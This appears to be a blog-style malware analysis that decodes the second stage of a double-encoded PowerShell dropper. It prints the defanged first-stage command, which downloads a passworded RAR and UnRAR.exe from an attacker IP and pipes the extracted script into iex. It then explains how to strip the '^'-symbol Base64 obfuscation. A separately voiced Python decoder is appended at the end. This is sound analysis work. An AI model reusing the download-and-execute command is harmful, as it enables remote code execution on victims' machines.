Analysis of the Second Stage of a Double-Encoded Malicious PowerShell

In the previous article, we talked about analyzing a double-encoded PowerShell file. Simply put, when you decode the code, it gives you another encoded PowerShell script that looks just like the first one, and when you decode that second script, it gives you the real code. What struck me about this sample is that it does not download an executable file directly. Instead, it downloads another stage of encoded PowerShell code, and only that stage downloads the final payload, which is an executable file.

Read Part 1 : https://reversethemalware.blogspot.com/2025/07/analysis-double-encoded-malicious.html

Great, if you're done reading the first part! In the first script, the attacker downloads a password-protected RAR file and then extracts a .txt file from it. You can see the code below (URLs defanged):

Invoke-WebRequest -Uri "http[://]95.164.55.39/main/glh/yhgdv8[.]rar" -OutFile "$env:TEMP\yhgdv8.rar"; iwr -Uri "http[://]95.164.55.39/UnRAR[.]exe" -OutFile "$env:TEMP\UnRAR.exe"; Start-Process -NoNewWindow -FilePath "$env:TEMP\UnRAR.exe" -ArgumentList "x", "-pvPNTfmDk9jjofeD", "-o+", "$env:TEMP\yhgdv8.rar", "$env:TEMP"; Start-Sleep -Seconds 4; Get-Content "$env:TEMP\yhgdv8.txt" | iex;

Then I tried to find out what was in the text file. I suspected it must be PowerShell, and I'm glad my interpretation was right: what was in the TXT file was a differently encoded PowerShell script. We will explain the difference in this article. You can look at the picture below to see the difference:


In this version of the PowerShell code, we notice that the attacker has used Base64 again. But if we look at the Replace part of the code, $kls.Replace('^', ''))), we see that the attacker uses symbol obfuscation to complicate the decoding: '^' characters are inserted throughout the Base64 string, and the script strips them at runtime before decoding it. The solution to this problem is very easy. Copy the encoded code, press Ctrl + F in Notepad, paste the symbol into the Find field, leave the Replace field empty, and Replace All cleans it up. In CyberChef, the Find / Replace operation does the same thing as Notepad.

Now we will decode the first part of the code through CyberChef, after removing the symbol. For the decoding method, paste the cleaned encoded code into the Input pane on the right-hand side of CyberChef and select From Base64 from the Operations list:


Then we move on to the second line of the encoded code and repeat the same process. But be careful not to apply Find / Replace to the second line, because the symbol is not used there.
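As an added example (my own Python, not the author's code and not the malware's), here is the same Find / Replace plus From Base64 workflow in script form. It generalizes the manual step by stripping any character outside the Base64 alphabet, so it decodes both a line with the '^' symbol and a line without it. The two encoded lines are constructed stand-ins for the contents of yhgdv8.txt, and the UTF-8 / UTF-16LE guess is an assumption, since the post does not state which encoding the sample uses.

```python
import base64
import re

# Anything outside the Base64 alphabet (and '=' padding) is an inserted
# obfuscation symbol, such as the '^' that $kls.Replace('^', '') removes.
NOT_B64 = re.compile(r"[^A-Za-z0-9+/=]")

def bytes_to_text(raw: bytes) -> str:
    # Assumption: PowerShell -EncodedCommand payloads are UTF-16LE, which shows
    # up as every second byte being NUL for ASCII text; otherwise assume UTF-8.
    if len(raw) >= 2 and len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")

def decode_line(blob: str) -> tuple[str, str]:
    """Return (decoded text, symbols removed) for one encoded line.
    Whitespace is dropped, non-Base64 symbols are stripped (the Find /
    Replace step), padding is repaired, then the blob is Base64-decoded."""
    compact = re.sub(r"\s+", "", blob)
    junk = "".join(sorted(set(NOT_B64.findall(compact))))
    cleaned = NOT_B64.sub("", compact)
    cleaned += "=" * (-len(cleaned) % 4)
    return bytes_to_text(base64.b64decode(cleaned, validate=True)), junk

def decode_stage_file(text: str) -> list[tuple[str, str]]:
    """Decode every non-empty line of the dropped .txt stage independently,
    so a line without the symbol is handled the same way as one with it."""
    return [decode_line(line) for line in text.splitlines() if line.strip()]

# --- constructed sample standing in for yhgdv8.txt (not the real payload) ---
def _b64(s: str) -> str:
    return base64.b64encode(s.encode("utf-8")).decode("ascii")

def _sprinkle(s: str, symbol: str = "^", every: int = 5) -> str:
    # Insert the obfuscation symbol between chunks, as the sample's first line does.
    return symbol.join(s[i:i + every] for i in range(0, len(s), every))

FIRST_LINE = _sprinkle(_b64("Write-Host 'line one'"))   # uses the '^' trick
SECOND_LINE = _b64("Write-Host 'line two'")             # plain Base64, no symbol
STAGE_FILE = FIRST_LINE + "\n" + SECOND_LINE

if __name__ == "__main__":
    for decoded, removed in decode_stage_file(STAGE_FILE):
        print(f"removed={removed!r:4} -> {decoded}")
```

The second element of each tuple tells you which symbols were stripped, which is a quick way to confirm that only the first line carried the obfuscation.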